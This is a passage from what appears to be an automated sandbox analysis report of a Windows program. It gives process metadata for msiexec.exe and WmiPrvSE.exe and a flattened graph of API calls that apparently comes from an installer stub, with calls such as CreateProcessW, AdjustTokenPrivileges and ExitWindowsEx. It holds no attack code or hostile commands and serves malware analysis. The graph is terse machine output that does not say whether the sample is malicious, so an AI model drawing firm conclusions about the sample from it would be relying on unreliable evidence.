                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:6
                                                                    Start time:11:20:54
                                                                    Start date:15/11/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                    Imagebase:0x750000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:7
                                                                    Start time:11:21:09
                                                                    Start date:15/11/2024
                                                                    Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                                    Imagebase:0x4f0000
                                                                    File size:418'304 bytes
                                                                    MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:22%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:22.1%
                                                                      Total number of Nodes:1331
                                                                      Total number of Limit Nodes:36
                                                                      execution_graph 3914 402840 3915 402bbf 18 API calls 3914->3915 3917 40284e 3915->3917 3916 402864 3919 405bcf 2 API calls 3916->3919 3917->3916 3918 402bbf 18 API calls 3917->3918 3918->3916 3920 40286a 3919->3920 3942 405bf4 GetFileAttributesW CreateFileW 3920->3942 3922 402877 3923 402883 GlobalAlloc 3922->3923 3924 40291a 3922->3924 3927 402911 CloseHandle 3923->3927 3928 40289c 3923->3928 3925 402922 DeleteFileW 3924->3925 3926 402935 3924->3926 3925->3926 3927->3924 3943 403222 SetFilePointer 3928->3943 3930 4028a2 3931 40320c ReadFile 3930->3931 3932 4028ab GlobalAlloc 3931->3932 3933 4028bb 3932->3933 3934 4028ef 3932->3934 3935 403027 36 API calls 3933->3935 3936 405ca6 WriteFile 3934->3936 3937 4028c8 3935->3937 3938 4028fb GlobalFree 3936->3938 3940 4028e6 GlobalFree 3937->3940 3939 403027 36 API calls 3938->3939 3941 40290e 3939->3941 3940->3934 3941->3927 3942->3922 3943->3930 3944 401cc0 3945 402ba2 18 API calls 3944->3945 3946 401cc7 3945->3946 3947 402ba2 18 API calls 3946->3947 3948 401ccf GetDlgItem 3947->3948 3949 402531 3948->3949 3950 4029c0 3951 402ba2 18 API calls 3950->3951 3952 4029c6 3951->3952 3953 4029f9 3952->3953 3954 40281e 3952->3954 3956 4029d4 3952->3956 3953->3954 3955 406041 18 API calls 3953->3955 3955->3954 3956->3954 3958 405f66 wsprintfW 3956->3958 3958->3954 3959 401fc3 3960 401fd5 3959->3960 3961 402087 3959->3961 3962 402bbf 18 API calls 3960->3962 3963 401423 25 API calls 3961->3963 3964 401fdc 3962->3964 3969 4021e1 3963->3969 3965 402bbf 18 API calls 3964->3965 3966 401fe5 3965->3966 3967 401ffb LoadLibraryExW 3966->3967 3968 401fed GetModuleHandleW 3966->3968 3967->3961 3970 40200c 3967->3970 3968->3967 3968->3970 3979 406464 WideCharToMultiByte 3970->3979 3973 402056 3975 40517e 25 API calls 3973->3975 3974 40201d 3976 401423 25 API calls 3974->3976 3977 40202d 3974->3977 3975->3977 3976->3977 3977->3969 3978 402079 FreeLibrary 3977->3978 3978->3969 3980 402017 3979->3980 3981 40648e GetProcAddress 3979->3981 3980->3973 3980->3974 3981->3980 3982 4016c4 3983 402bbf 18 API calls 3982->3983 3984 4016ca GetFullPathNameW 3983->3984 3985 4016e4 3984->3985 3991 401706 3984->3991 3988 406362 2 API calls 3985->3988 3985->3991 3986 40171b GetShortPathNameW 3987 402a4c 3986->3987 3989 4016f6 3988->3989 3989->3991 3992 40601f lstrcpynW 3989->3992 3991->3986 3991->3987 3992->3991 4003 40194e 4004 402bbf 18 API calls 4003->4004 4005 401955 lstrlenW 4004->4005 4006 402531 4005->4006 4007 4027ce 4008 4027d6 4007->4008 4009 4027da FindNextFileW 4008->4009 4011 4027ec 4008->4011 4010 402833 4009->4010 4009->4011 4013 40601f lstrcpynW 4010->4013 4013->4011 3743 401754 3744 402bbf 18 API calls 3743->3744 3745 40175b 3744->3745 3746 405c23 2 API calls 3745->3746 3747 401762 3746->3747 3748 405c23 2 API calls 3747->3748 3748->3747 4014 4048d4 4015 404900 4014->4015 4016 4048e4 4014->4016 4017 404933 4015->4017 4018 404906 SHGetPathFromIDListW 4015->4018 4025 405748 GetDlgItemTextW 4016->4025 4021 40491d SendMessageW 4018->4021 4022 404916 4018->4022 4020 4048f1 SendMessageW 4020->4015 4021->4017 4023 40140b 2 API calls 4022->4023 4023->4021 4025->4020 4026 401d56 GetDC GetDeviceCaps 4027 402ba2 18 API calls 4026->4027 4028 401d74 MulDiv ReleaseDC 4027->4028 4029 402ba2 18 API calls 4028->4029 4030 401d93 4029->4030 4031 406041 18 API calls 4030->4031 4032 401dcc CreateFontIndirectW 4031->4032 4033 402531 4032->4033 4041 401a57 4042 402ba2 18 API calls 4041->4042 4043 401a5d 4042->4043 4044 402ba2 18 API calls 4043->4044 4045 401a05 4044->4045 4046 4014d7 4047 402ba2 18 API calls 4046->4047 4048 4014dd Sleep 4047->4048 4050 402a4c 4048->4050 4051 40155b 4052 4029f2 4051->4052 4055 405f66 wsprintfW 4052->4055 4054 4029f7 4055->4054 4056 401ddc 4057 402ba2 18 API calls 4056->4057 4058 401de2 4057->4058 4059 402ba2 18 API calls 4058->4059 4060 401deb 4059->4060 4061 401df2 ShowWindow 4060->4061 4062 401dfd EnableWindow 4060->4062 4063 402a4c 4061->4063 4062->4063 3892 401bdf 3893 402ba2 18 API calls 3892->3893 3894 401be6 3893->3894 3895 402ba2 18 API calls 3894->3895 3896 401bf0 3895->3896 3897 401c00 3896->3897 3898 402bbf 18 API calls 3896->3898 3899 401c10 3897->3899 3900 402bbf 18 API calls 3897->3900 3898->3897 3901 401c1b 3899->3901 3902 401c5f 3899->3902 3900->3899 3904 402ba2 18 API calls 3901->3904 3903 402bbf 18 API calls 3902->3903 3905 401c64 3903->3905 3906 401c20 3904->3906 3908 402bbf 18 API calls 3905->3908 3907 402ba2 18 API calls 3906->3907 3909 401c29 3907->3909 3910 401c6d FindWindowExW 3908->3910 3911 401c31 SendMessageTimeoutW 3909->3911 3912 401c4f SendMessageW 3909->3912 3913 401c8f 3910->3913 3911->3913 3912->3913 4064 4022df 4065 402bbf 18 API calls 4064->4065 4066 4022ee 4065->4066 4067 402bbf 18 API calls 4066->4067 4068 4022f7 4067->4068 4069 402bbf 18 API calls 4068->4069 4070 402301 GetPrivateProfileStringW 4069->4070 4071 401960 4072 402ba2 18 API calls 4071->4072 4073 401967 4072->4073 4074 402ba2 18 API calls 4073->4074 4075 401971 4074->4075 4076 402bbf 18 API calls 4075->4076 4077 40197a 4076->4077 4078 40198e lstrlenW 4077->4078 4083 4019ca 4077->4083 4079 401998 4078->4079 4079->4083 4084 40601f lstrcpynW 4079->4084 4081 4019b3 4082 4019c0 lstrlenW 4081->4082 4081->4083 4082->4083 4084->4081 4085 401662 4086 402bbf 18 API calls 4085->4086 4087 401668 4086->4087 4088 406362 2 API calls 4087->4088 4089 40166e 4088->4089 4090 4066e3 4094 406567 4090->4094 4091 406ed2 4092 4065f1 GlobalAlloc 4092->4091 4092->4094 4093 4065e8 GlobalFree 4093->4092 4094->4091 4094->4092 4094->4093 4095 406668 GlobalAlloc 4094->4095 4096 40665f GlobalFree 4094->4096 4095->4091 4095->4094 4096->4095 4097 4019e4 4098 402bbf 18 API calls 4097->4098 4099 4019eb 4098->4099 4100 402bbf 18 API calls 4099->4100 4101 4019f4 4100->4101 4102 4019fb lstrcmpiW 4101->4102 4103 401a0d lstrcmpW 4101->4103 4104 401a01 4102->4104 4103->4104 4105 4025e5 4106 402ba2 18 API calls 4105->4106 4107 4025f4 4106->4107 4108 40263a ReadFile 4107->4108 4109 405c77 ReadFile 4107->4109 4111 40267a MultiByteToWideChar 4107->4111 4112 40272f 4107->4112 4114 4026a0 SetFilePointer MultiByteToWideChar 4107->4114 4115 402740 4107->4115 4117 40272d 4107->4117 4118 405cd5 SetFilePointer 4107->4118 4108->4107 4108->4117 4109->4107 4111->4107 4127 405f66 wsprintfW 4112->4127 4114->4107 4116 402761 SetFilePointer 4115->4116 4115->4117 4116->4117 4119 405cf1 4118->4119 4120 405d0d 4118->4120 4121 405c77 ReadFile 4119->4121 4120->4107 4122 405cfd 4121->4122 4122->4120 4123 405d16 SetFilePointer 4122->4123 4124 405d3e SetFilePointer 4122->4124 4123->4124 4125 405d21 4123->4125 4124->4120 4126 405ca6 WriteFile 4125->4126 4126->4120 4127->4117 3081 401e66 3099 402bbf 3081->3099 3088 401edb CloseHandle 3091 40281e 3088->3091 3089 401e8c WaitForSingleObject 3090 401e9e 3089->3090 3092 401eb0 GetExitCodeProcess 3090->3092 3119 406431 3090->3119 3094 401ec2 3092->3094 3095 401ecf 3092->3095 3123 405f66 wsprintfW 3094->3123 3095->3088 3098 401ecd 3095->3098 3098->3088 3100 402bcb 3099->3100 3124 406041 3100->3124 3103 401e6c 3105 40517e 3103->3105 3106 405199 3105->3106 3107 401e76 3105->3107 3108 4051b5 lstrlenW 3106->3108 3109 406041 18 API calls 3106->3109 3116 4056ff CreateProcessW 3107->3116 3110 4051c3 lstrlenW 3108->3110 3111 4051de 3108->3111 3109->3108 3110->3107 3112 4051d5 lstrcatW 3110->3112 3113 4051f1 3111->3113 3114 4051e4 SetWindowTextW 3111->3114 3112->3111 3113->3107 3115 4051f7 SendMessageW SendMessageW SendMessageW 3113->3115 3114->3113 3115->3107 3117 405732 CloseHandle 3116->3117 3118 401e7c 3116->3118 3117->3118 3118->3088 3118->3089 3118->3091 3120 40644e PeekMessageW 3119->3120 3121 406444 DispatchMessageW 3120->3121 3122 401ea5 WaitForSingleObject 3120->3122 3121->3120 3122->3090 3123->3098 3125 40604e 3124->3125 3126 406299 3125->3126 3129 406101 GetVersion 3125->3129 3130 406267 lstrlenW 3125->3130 3133 406041 10 API calls 3125->3133 3135 40617c GetSystemDirectoryW 3125->3135 3136 40618f GetWindowsDirectoryW 3125->3136 3137 4062b3 5 API calls 3125->3137 3138 406041 10 API calls 3125->3138 3139 406208 lstrcatW 3125->3139 3140 4061c3 SHGetSpecialFolderLocation 3125->3140 3151 405eec RegOpenKeyExW 3125->3151 3156 405f66 wsprintfW 3125->3156 3157 40601f lstrcpynW 3125->3157 3127 402bec 3126->3127 3158 40601f lstrcpynW 3126->3158 3127->3103 3142 4062b3 3127->3142 3129->3125 3130->3125 3133->3130 3135->3125 3136->3125 3137->3125 3138->3125 3139->3125 3140->3125 3141 4061db SHGetPathFromIDListW CoTaskMemFree 3140->3141 3141->3125 3148 4062c0 3142->3148 3143 40633b CharPrevW 3145 406336 3143->3145 3144 406329 CharNextW 3144->3145 3144->3148 3145->3143 3146 40635c 3145->3146 3146->3103 3148->3144 3148->3145 3149 406315 CharNextW 3148->3149 3150 406324 CharNextW 3148->3150 3159 405a00 3148->3159 3149->3148 3150->3144 3152 405f60 3151->3152 3153 405f20 RegQueryValueExW 3151->3153 3152->3125 3154 405f41 RegCloseKey 3153->3154 3154->3152 3156->3125 3157->3125 3158->3127 3160 405a06 3159->3160 3161 405a1c 3160->3161 3162 405a0d CharNextW 3160->3162 3161->3148 3162->3160 3163 401767 3164 402bbf 18 API calls 3163->3164 3165 40176e 3164->3165 3166 401796 3165->3166 3167 40178e 3165->3167 3224 40601f lstrcpynW 3166->3224 3223 40601f lstrcpynW 3167->3223 3170 401794 3173 4062b3 5 API calls 3170->3173 3171 4017a1 3225 4059d3 lstrlenW CharPrevW 3171->3225 3179 4017b3 3173->3179 3178 4017c5 CompareFileTime 3178->3179 3179->3178 3180 401885 3179->3180 3184 40601f lstrcpynW 3179->3184 3188 406041 18 API calls 3179->3188 3199 40185c 3179->3199 3201 405bf4 GetFileAttributesW CreateFileW 3179->3201 3228 406362 FindFirstFileW 3179->3228 3231 405bcf GetFileAttributesW 3179->3231 3234 405764 3179->3234 3181 40517e 25 API calls 3180->3181 3182 40188f 3181->3182 3202 403027 3182->3202 3183 40517e 25 API calls 3200 401871 3183->3200 3184->3179 3187 4018b6 SetFileTime 3189 4018c8 CloseHandle 3187->3189 3188->3179 3190 4018d9 3189->3190 3189->3200 3191 4018f1 3190->3191 3192 4018de 3190->3192 3194 406041 18 API calls 3191->3194 3193 406041 18 API calls 3192->3193 3196 4018e6 lstrcatW 3193->3196 3197 4018f9 3194->3197 3196->3197 3198 405764 MessageBoxIndirectW 3197->3198 3198->3200 3199->3183 3199->3200 3201->3179 3204 403040 3202->3204 3203 40306b 3238 40320c 3203->3238 3204->3203 3250 403222 SetFilePointer 3204->3250 3208 403088 GetTickCount 3219 40309b 3208->3219 3209 4031ac 3210 4031b0 3209->3210 3215 4031c8 3209->3215 3212 40320c ReadFile 3210->3212 3211 4018a2 3211->3187 3211->3189 3212->3211 3213 40320c ReadFile 3213->3215 3214 40320c ReadFile 3214->3219 3215->3211 3215->3213 3216 405ca6 WriteFile 3215->3216 3216->3215 3218 403101 GetTickCount 3218->3219 3219->3211 3219->3214 3219->3218 3220 40312a MulDiv wsprintfW 3219->3220 3241 406534 3219->3241 3248 405ca6 WriteFile 3219->3248 3221 40517e 25 API calls 3220->3221 3221->3219 3223->3170 3224->3171 3226 4017a7 lstrcatW 3225->3226 3227 4059ef lstrcatW 3225->3227 3226->3170 3227->3226 3229 406383 3228->3229 3230 406378 FindClose 3228->3230 3229->3179 3230->3229 3232 405be1 SetFileAttributesW 3231->3232 3233 405bee 3231->3233 3232->3233 3233->3179 3235 405779 3234->3235 3236 4057c5 3235->3236 3237 40578d MessageBoxIndirectW 3235->3237 3236->3179 3237->3236 3251 405c77 ReadFile 3238->3251 3242 406559 3241->3242 3243 406561 3241->3243 3242->3219 3243->3242 3244 4065f1 GlobalAlloc 3243->3244 3245 4065e8 GlobalFree 3243->3245 3246 406668 GlobalAlloc 3243->3246 3247 40665f GlobalFree 3243->3247 3244->3242 3244->3243 3245->3244 3246->3242 3246->3243 3247->3246 3249 405cc4 3248->3249 3249->3219 3250->3203 3252 403076 3251->3252 3252->3208 3252->3209 3252->3211 4128 401ee9 4129 402bbf 18 API calls 4128->4129 4130 401ef0 4129->4130 4131 406362 2 API calls 4130->4131 4132 401ef6 4131->4132 4134 401f07 4132->4134 4135 405f66 wsprintfW 4132->4135 4135->4134 3253 40326a SetErrorMode GetVersion 3254 40329e 3253->3254 3255 4032a4 3253->3255 3256 4063f5 5 API calls 3254->3256 3344 406389 GetSystemDirectoryW 3255->3344 3256->3255 3258 4032bb 3259 406389 3 API calls 3258->3259 3260 4032c5 3259->3260 3261 406389 3 API calls 3260->3261 3262 4032cf 3261->3262 3347 4063f5 GetModuleHandleA 3262->3347 3265 4063f5 5 API calls 3266 4032dd #17 OleInitialize SHGetFileInfoW 3265->3266 3353 40601f lstrcpynW 3266->3353 3268 40331a GetCommandLineW 3354 40601f lstrcpynW 3268->3354 3270 40332c GetModuleHandleW 3271 403344 3270->3271 3272 405a00 CharNextW 3271->3272 3273 403353 CharNextW 3272->3273 3274 40347e GetTempPathW 3273->3274 3284 40336c 3273->3284 3355 403239 3274->3355 3276 403496 3277 4034f0 DeleteFileW 3276->3277 3278 40349a GetWindowsDirectoryW lstrcatW 3276->3278 3365 402dee GetTickCount GetModuleFileNameW 3277->3365 3279 403239 12 API calls 3278->3279 3282 4034b6 3279->3282 3280 405a00 CharNextW 3280->3284 3282->3277 3285 4034ba GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3282->3285 3283 403504 3286 4035bb ExitProcess CoUninitialize 3283->3286 3292 4035a7 3283->3292 3298 405a00 CharNextW 3283->3298 3284->3280 3289 403469 3284->3289 3291 403467 3284->3291 3290 403239 12 API calls 3285->3290 3287 4036f2 3286->3287 3288 4035d2 3286->3288 3294 403776 ExitProcess 3287->3294 3295 4036fa GetCurrentProcess OpenProcessToken 3287->3295 3293 405764 MessageBoxIndirectW 3288->3293 3449 40601f lstrcpynW 3289->3449 3296 4034e8 3290->3296 3291->3274 3393 403868 3292->3393 3302 4035e0 ExitProcess 3293->3302 3303 403712 LookupPrivilegeValueW AdjustTokenPrivileges 3295->3303 3304 403746 3295->3304 3296->3277 3296->3286 3309 403523 3298->3309 3300 4035b7 3300->3286 3303->3304 3305 4063f5 5 API calls 3304->3305 3308 40374d 3305->3308 3306 403581 3450 405adb 3306->3450 3307 4035e8 3466 4056e7 3307->3466 3312 403762 ExitWindowsEx 3308->3312 3313 40376f 3308->3313 3309->3306 3309->3307 3312->3294 3312->3313 3483 40140b 3313->3483 3317 403609 lstrcatW lstrcmpiW 3317->3286 3319 403625 3317->3319 3318 4035fe lstrcatW 3318->3317 3321 403631 3319->3321 3322 40362a 3319->3322 3474 4056ca CreateDirectoryW 3321->3474 3469 40564d CreateDirectoryW 3322->3469 3323 40359c 3465 40601f lstrcpynW 3323->3465 3327 403636 SetCurrentDirectoryW 3329 403651 3327->3329 3330 403646 3327->3330 3478 40601f lstrcpynW 3329->3478 3477 40601f lstrcpynW 3330->3477 3333 406041 18 API calls 3334 403690 DeleteFileW 3333->3334 3335 40369d CopyFileW 3334->3335 3341 40365f 3334->3341 3335->3341 3336 4036e6 3337 405ec0 38 API calls 3336->3337 3339 4036ed 3337->3339 3339->3286 3340 406041 18 API calls 3340->3341 3341->3333 3341->3336 3341->3340 3342 4056ff 2 API calls 3341->3342 3343 4036d1 CloseHandle 3341->3343 3479 405ec0 MoveFileExW 3341->3479 3342->3341 3343->3341 3346 4063ab wsprintfW LoadLibraryW 3344->3346 3346->3258 3348 406411 3347->3348 3349 40641b GetProcAddress 3347->3349 3350 406389 3 API calls 3348->3350 3351 4032d6 3349->3351 3352 406417 3350->3352 3351->3265 3352->3349 3352->3351 3353->3268 3354->3270 3356 4062b3 5 API calls 3355->3356 3357 403245 3356->3357 3358 40324f 3357->3358 3359 4059d3 3 API calls 3357->3359 3358->3276 3360 403257 3359->3360 3361 4056ca 2 API calls 3360->3361 3362 40325d 3361->3362 3486 405c23 3362->3486 3490 405bf4 GetFileAttributesW CreateFileW 3365->3490 3367 402e2e 3391 402e3e 3367->3391 3491 40601f lstrcpynW 3367->3491 3369 402e54 3492 405a1f lstrlenW 3369->3492 3373 402e65 GetFileSize 3374 402f61 3373->3374 3392 402e7c 3373->3392 3497 402d8a 3374->3497 3376 402f6a 3378 402f9a GlobalAlloc 3376->3378 3376->3391 3509 403222 SetFilePointer 3376->3509 3377 40320c ReadFile 3377->3392 3508 403222 SetFilePointer 3378->3508 3379 402fcd 3384 402d8a 6 API calls 3379->3384 3382 402f83 3385 40320c ReadFile 3382->3385 3383 402fb5 3386 403027 36 API calls 3383->3386 3384->3391 3387 402f8e 3385->3387 3389 402fc1 3386->3389 3387->3378 3387->3391 3388 402d8a 6 API calls 3388->3392 3389->3389 3390 402ffe SetFilePointer 3389->3390 3389->3391 3390->3391 3391->3283 3392->3374 3392->3377 3392->3379 3392->3388 3392->3391 3394 4063f5 5 API calls 3393->3394 3395 40387c 3394->3395 3396 403882 3395->3396 3397 403894 3395->3397 3526 405f66 wsprintfW 3396->3526 3398 405eec 3 API calls 3397->3398 3399 4038c4 3398->3399 3401 4038e3 lstrcatW 3399->3401 3403 405eec 3 API calls 3399->3403 3402 403892 3401->3402 3510 403b3e 3402->3510 3403->3401 3406 405adb 18 API calls 3407 403915 3406->3407 3408 4039a9 3407->3408 3410 405eec 3 API calls 3407->3410 3409 405adb 18 API calls 3408->3409 3411 4039af 3409->3411 3412 403947 3410->3412 3413 4039bf LoadImageW 3411->3413 3414 406041 18 API calls 3411->3414 3412->3408 3418 403968 lstrlenW 3412->3418 3420 405a00 CharNextW 3412->3420 3415 403a65 3413->3415 3416 4039e6 RegisterClassW 3413->3416 3414->3413 3417 40140b 2 API calls 3415->3417 3419 403a1c SystemParametersInfoW CreateWindowExW 3416->3419 3448 403a6f 3416->3448 3424 403a6b 3417->3424 3421 403976 lstrcmpiW 3418->3421 3422 40399c 3418->3422 3419->3415 3426 403965 3420->3426 3421->3422 3423 403986 GetFileAttributesW 3421->3423 3425 4059d3 3 API calls 3422->3425 3427 403992 3423->3427 3428 403b3e 19 API calls 3424->3428 3424->3448 3429 4039a2 3425->3429 3426->3418 3427->3422 3430 405a1f 2 API calls 3427->3430 3431 403a7c 3428->3431 3527 40601f lstrcpynW 3429->3527 3430->3422 3433 403a88 ShowWindow 3431->3433 3434 403b0b 3431->3434 3436 406389 3 API calls 3433->3436 3519 405251 OleInitialize 3434->3519 3438 403aa0 3436->3438 3437 403b11 3439 403b15 3437->3439 3440 403b2d 3437->3440 3441 403aae GetClassInfoW 3438->3441 3443 406389 3 API calls 3438->3443 3446 40140b 2 API calls 3439->3446 3439->3448 3442 40140b 2 API calls 3440->3442 3444 403ac2 GetClassInfoW RegisterClassW 3441->3444 3445 403ad8 DialogBoxParamW 3441->3445 3442->3448 3443->3441 3444->3445 3447 40140b 2 API calls 3445->3447 3446->3448 3447->3448 3448->3300 3449->3291 3536 40601f lstrcpynW 3450->3536 3452 405aec 3537 405a7e CharNextW CharNextW 3452->3537 3455 40358d 3455->3286 3464 40601f lstrcpynW 3455->3464 3456 4062b3 5 API calls 3462 405b02 3456->3462 3457 405b33 lstrlenW 3458 405b3e 3457->3458 3457->3462 3459 4059d3 3 API calls 3458->3459 3461 405b43 GetFileAttributesW 3459->3461 3460 406362 2 API calls 3460->3462 3461->3455 3462->3455 3462->3457 3462->3460 3463 405a1f 2 API calls 3462->3463 3463->3457 3464->3323 3465->3292 3467 4063f5 5 API calls 3466->3467 3468 4035ed lstrcatW 3467->3468 3468->3317 3468->3318 3470 40362f 3469->3470 3471 40569e GetLastError 3469->3471 3470->3327 3471->3470 3472 4056ad SetFileSecurityW 3471->3472 3472->3470 3473 4056c3 GetLastError 3472->3473 3473->3470 3475 4056da 3474->3475 3476 4056de GetLastError 3474->3476 3475->3327 3476->3475 3477->3329 3478->3341 3480 405ed4 3479->3480 3482 405ee1 3479->3482 3543 405d4e lstrcpyW 3480->3543 3482->3341 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3294 3487 405c30 GetTickCount GetTempFileNameW 3486->3487 3488 403268 3487->3488 3489 405c66 3487->3489 3488->3276 3489->3487 3489->3488 3490->3367 3491->3369 3493 405a2d 3492->3493 3494 405a33 CharPrevW 3493->3494 3495 402e5a 3493->3495 3494->3493 3494->3495 3496 40601f lstrcpynW 3495->3496 3496->3373 3498 402d93 3497->3498 3499 402dab 3497->3499 3500 402da3 3498->3500 3501 402d9c DestroyWindow 3498->3501 3502 402db3 3499->3502 3503 402dbb GetTickCount 3499->3503 3500->3376 3501->3500 3504 406431 2 API calls 3502->3504 3505 402dc9 CreateDialogParamW ShowWindow 3503->3505 3506 402dec 3503->3506 3507 402db9 3504->3507 3505->3506 3506->3376 3507->3376 3508->3383 3509->3382 3511 403b52 3510->3511 3528 405f66 wsprintfW 3511->3528 3513 403bc3 3514 406041 18 API calls 3513->3514 3515 403bcf SetWindowTextW 3514->3515 3516 4038f3 3515->3516 3517 403beb 3515->3517 3516->3406 3517->3516 3518 406041 18 API calls 3517->3518 3518->3517 3529 40412f 3519->3529 3521 405274 3524 40529b 3521->3524 3532 401389 3521->3532 3522 40412f SendMessageW 3523 4052ad CoUninitialize 3522->3523 3523->3437 3524->3522 3526->3402 3527->3408 3528->3513 3530 404147 3529->3530 3531 404138 SendMessageW 3529->3531 3530->3521 3531->3530 3534 401390 3532->3534 3533 4013fe 3533->3521 3534->3533 3535 4013cb MulDiv SendMessageW 3534->3535 3535->3534 3536->3452 3539 405a9b 3537->3539 3541 405aad 3537->3541 3538 405ad1 3538->3455 3538->3456 3540 405aa8 CharNextW 3539->3540 3539->3541 3540->3538 3541->3538 3542 405a00 CharNextW 3541->3542 3542->3541 3544 405d76 3543->3544 3545 405d9c GetShortPathNameW 3543->3545 3570 405bf4 GetFileAttributesW CreateFileW 3544->3570 3547 405db1 3545->3547 3548 405ebb 3545->3548 3547->3548 3550 405db9 wsprintfA 3547->3550 3548->3482 3549 405d80 CloseHandle GetShortPathNameW 3549->3548 3551 405d94 3549->3551 3552 406041 18 API calls 3550->3552 3551->3545 3551->3548 3553 405de1 3552->3553 3571 405bf4 GetFileAttributesW CreateFileW 3553->3571 3555 405dee 3555->3548 3556 405dfd GetFileSize GlobalAlloc 3555->3556 3557 405eb4 CloseHandle 3556->3557 3558 405e1f 3556->3558 3557->3548 3559 405c77 ReadFile 3558->3559 3560 405e27 3559->3560 3560->3557 3572 405b59 lstrlenA 3560->3572 3563 405e52 3565 405b59 4 API calls 3563->3565 3564 405e3e lstrcpyA 3566 405e60 3564->3566 3565->3566 3567 405e97 SetFilePointer 3566->3567 3568 405ca6 WriteFile 3567->3568 3569 405ead GlobalFree 3568->3569 3569->3557 3570->3549 3571->3555 3573 405b9a lstrlenA 3572->3573 3574 405ba2 3573->3574 3575 405b73 lstrcmpiA 3573->3575 3574->3563 3574->3564 3575->3574 3576 405b91 CharNextA 3575->3576 3576->3573 4136 4021ea 4137 402bbf 18 API calls 4136->4137 4138 4021f0 4137->4138 4139 402bbf 18 API calls 4138->4139 4140 4021f9 4139->4140 4141 402bbf 18 API calls 4140->4141 4142 402202 4141->4142 4143 406362 2 API calls 4142->4143 4144 40220b 4143->4144 4145 40221c lstrlenW lstrlenW 4144->4145 4149 40220f 4144->4149 4147 40517e 25 API calls 4145->4147 4146 40517e 25 API calls 4150 402217 4146->4150 4148 40225a SHFileOperationW 4147->4148 4148->4149 4148->4150 4149->4146 4149->4150 4151 40156b 4152 401584 4151->4152 4153 40157b ShowWindow 4151->4153 4154 401592 ShowWindow 4152->4154 4155 402a4c 4152->4155 4153->4152 4154->4155 4163 40226e 4164 402275 4163->4164 4167 402288 4163->4167 4165 406041 18 API calls 4164->4165 4166 402282 4165->4166 4168 405764 MessageBoxIndirectW 4166->4168 4168->4167 4169 4014f1 SetForegroundWindow 4170 402a4c 4169->4170 4171 4050f2 4172 405102 4171->4172 4173 405116 4171->4173 4175 405108 4172->4175 4183 40515f 4172->4183 4174 40511e IsWindowVisible 4173->4174 4180 405135 4173->4180 4176 40512b 4174->4176 4174->4183 4178 40412f SendMessageW 4175->4178 4184 404a48 SendMessageW 4176->4184 4177 405164 CallWindowProcW 4181 405112 4177->4181 4178->4181 4180->4177 4189 404ac8 4180->4189 4183->4177 4185 404aa7 SendMessageW 4184->4185 4186 404a6b GetMessagePos ScreenToClient SendMessageW 4184->4186 4188 404a9f 4185->4188 4187 404aa4 4186->4187 4186->4188 4187->4185 4188->4180 4198 40601f lstrcpynW 4189->4198 4191 404adb 4199 405f66 wsprintfW 4191->4199 4193 404ae5 4194 40140b 2 API calls 4193->4194 4195 404aee 4194->4195 4200 40601f lstrcpynW 4195->4200 4197 404af5 4197->4183 4198->4191 4199->4193 4200->4197 4201 401673 4202 402bbf 18 API calls 4201->4202 4203 40167a 4202->4203 4204 402bbf 18 API calls 4203->4204 4205 401683 4204->4205 4206 402bbf 18 API calls 4205->4206 4207 40168c MoveFileW 4206->4207 4208 401698 4207->4208 4209 40169f 4207->4209 4210 401423 25 API calls 4208->4210 4211 406362 2 API calls 4209->4211 4213 4021e1 4209->4213 4210->4213 4212 4016ae 4211->4212 4212->4213 4214 405ec0 38 API calls 4212->4214 4214->4208 4215 4041f7 lstrcpynW lstrlenW 4216 404afa GetDlgItem GetDlgItem 4217 404b4c 7 API calls 4216->4217 4256 404d65 4216->4256 4218 404be2 SendMessageW 4217->4218 4219 404bef DeleteObject 4217->4219 4218->4219 4220 404bf8 4219->4220 4221 404c2f 4220->4221 4224 406041 18 API calls 4220->4224 4222 4040e3 19 API calls 4221->4222 4228 404c43 4222->4228 4223 404ef5 4225 404f07 4223->4225 4226 404eff SendMessageW 4223->4226 4227 404c11 SendMessageW SendMessageW 4224->4227 4237 404f20 4225->4237 4238 404f19 ImageList_Destroy 4225->4238 4245 404f30 4225->4245 4226->4225 4227->4220 4232 4040e3 19 API calls 4228->4232 4229 404d58 4234 40414a 8 API calls 4229->4234 4230 404e3b SendMessageW 4236 404e49 4230->4236 4231 404a48 5 API calls 4249 404dd6 4231->4249 4250 404c51 4232->4250 4233 404ea2 SendMessageW 4233->4229 4240 404eb7 SendMessageW 4233->4240 4235 4050eb 4234->4235 4236->4223 4236->4229 4236->4233 4241 404f29 GlobalFree 4237->4241 4237->4245 4238->4237 4239 40509f 4239->4229 4246 4050b1 ShowWindow GetDlgItem ShowWindow 4239->4246 4243 404eca 4240->4243 4241->4245 4242 404d26 GetWindowLongW SetWindowLongW 4244 404d3f 4242->4244 4254 404edb SendMessageW 4243->4254 4247 404d45 ShowWindow 4244->4247 4248 404d5d 4244->4248 4245->4239 4259 404ac8 4 API calls 4245->4259 4263 404f6b 4245->4263 4246->4229 4267 404118 SendMessageW 4247->4267 4268 404118 SendMessageW 4248->4268 4249->4230 4249->4236 4250->4242 4253 404ca1 SendMessageW 4250->4253 4255 404d20 4250->4255 4257 404cdd SendMessageW 4250->4257 4258 404cee SendMessageW 4250->4258 4253->4250 4254->4223 4255->4242 4255->4244 4256->4231 4256->4236 4256->4249 